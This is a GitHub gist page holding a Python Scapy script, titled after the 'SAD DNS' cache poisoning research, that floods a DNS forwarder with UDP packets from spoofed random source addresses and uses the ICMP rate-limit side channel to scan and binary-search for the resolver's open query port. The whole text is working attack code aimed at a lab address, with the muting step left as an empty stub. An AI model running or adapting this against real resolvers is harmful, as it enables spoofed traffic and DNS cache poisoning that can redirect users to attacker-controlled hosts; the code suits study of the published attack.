Created
June 28, 2021 05:11
-
-
Save WangYihang/edc196131f1d35d53ba63dafa419f1d5 to your computer and use it in GitHub Desktop.
DNS Cache Poisoning Attack Reloaded: Revolutions with Side Channels
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# #!/usr/bin/env python | |
from scapy.all import * | |
from faker import Faker | |
class SAD: | |
def __init__(self, fdns) -> None: | |
self.start_port = 0x8000 | |
self.end_port = 0x10000 | |
self.socket = conf.L2socket(iface="ens33") | |
self.icmp_ratelimit = 20 | |
self.fdns = fdns | |
self.wait_time = 0.005 | |
self.packets_sent = 0 | |
self.bytes_sent = 0 | |
self.faker = Faker() | |
def scan(self): | |
for i in range(self.start_port, self.end_port, self.icmp_ratelimit): | |
time.sleep(self.wait_time) | |
packets = [] | |
for port in range(i, i+self.icmp_ratelimit): | |
packets.append(Ether()/IP(src=self.faker.ipv4(), | |
dst=self.fdns)/UDP(dport=port)) | |
start = time.time() | |
for p in packets: | |
self.socket.send(p) | |
self.packets_sent += 1 | |
self.bytes_sent += len(bytes(p)) | |
end = time.time() | |
print(i, i + self.icmp_ratelimit, end - start) | |
if self.wait(): return i | |
return None | |
def wait(self): | |
probe = Ether()/IP(dst=self.fdns)/UDP(dport=1) | |
reply = self.socket.sr1(probe, timeout=0.02, verbose=False) | |
if reply != None \ | |
and reply.haslayer(ICMP) \ | |
and reply.getlayer(ICMP).type == 0x03 \ | |
and reply.getlayer(ICMP).code == 0x03: | |
return True | |
return False | |
def generate(self, section_start, l, r): | |
ports = [i for i in range( | |
section_start, section_start + self.icmp_ratelimit)] | |
masks = [True for _ in range(self.icmp_ratelimit)] | |
mid = int((l + r) / 2) | |
for i in range(l, mid + 1): | |
masks[i] = False | |
packets = [] | |
for i, _ in enumerate(ports): | |
mask, port = masks[i], ports[i] | |
dport = 1 if mask else port | |
packets.append(Ether()/IP(src=self.faker.ipv4(), | |
dst=self.fdns)/UDP(dport=dport)) | |
return packets | |
def guess(self, section_start): | |
l, r = 0, self.icmp_ratelimit - 1 | |
while l < r: | |
time.sleep(self.wait_time) | |
m = int((l + r) / 2) | |
packets = self.generate(section_start, l, r) | |
for p in packets: | |
self.socket.send(p) | |
self.packets_sent += 1 | |
self.bytes_sent += len(bytes(p)) | |
rcvd = self.wait() | |
print(l, m, r) | |
if rcvd: | |
r = m | |
else: | |
l = m + 1 | |
port = section_start + l | |
return port | |
def mute(self, resolver): | |
pass | |
def test(): | |
fdns = "192.168.88.130" | |
sad = SAD(fdns=fdns) | |
section_start = sad.scan() | |
port = sad.guess(section_start=section_start) | |
print(port) | |
if __name__ == "__main__": | |
test() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment